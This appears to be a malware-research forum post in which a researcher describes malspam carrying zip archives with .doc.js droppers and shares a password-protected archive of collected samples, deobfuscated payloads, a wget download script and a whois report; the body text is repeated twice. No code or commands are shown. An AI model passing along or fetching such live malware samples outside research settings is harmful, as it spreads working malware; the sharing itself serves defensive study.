Dear Kernelmode-Community,
Some weeks ago I got some malware-attached emails by interfax.org. It' was a zip archive that contains a *.doc.js file as dropper for other binaries.
I want to share this case with you. Here is a quick-overview:
You can read my full-report on my blog http://en.nullday.de/it-sec/2015/11/29/ ... rs-part-1/. So I will make it short.
I attached a 7z-archive with this post. You'll find in this archive:
3 directories with files:
executables (contains all executables that I could grab)
js-dropper (contains all JS-Droppers that I could collect)
payloads (The deobfuscated payload of all JS-Droppers)
and these two 'special'-files:
download.sh (it's a script for downloading all executables via crafted wget's. Created by me for collecting all executables)
whois-report.txt (Whois-Report about all malicious hosts.. many yahoo-hosts(!!) )
Some weeks ago I got some malware-attached emails by interfax.org. It' was a zip archive that contains a *.doc.js file as dropper for other binaries.
I want to share this case with you. Here is a quick-overview:
You can read my full-report on my blog http://en.nullday.de/it-sec/2015/11/29/ ... rs-part-1/. So I will make it short.
I attached a 7z-archive with this post. You'll find in this archive:
3 directories with files:
executables (contains all executables that I could grab)
js-dropper (contains all JS-Droppers that I could collect)
payloads (The deobfuscated payload of all JS-Droppers)
and these two 'special'-files:
download.sh (it's a script for downloading all executables via crafted wget's. Created by me for collecting all executables)
whois-report.txt (Whois-Report about all malicious hosts.. many yahoo-hosts(!!) )
Attachments
password as usual
(1.29 MiB) Downloaded 65 times
(1.29 MiB) Downloaded 65 times
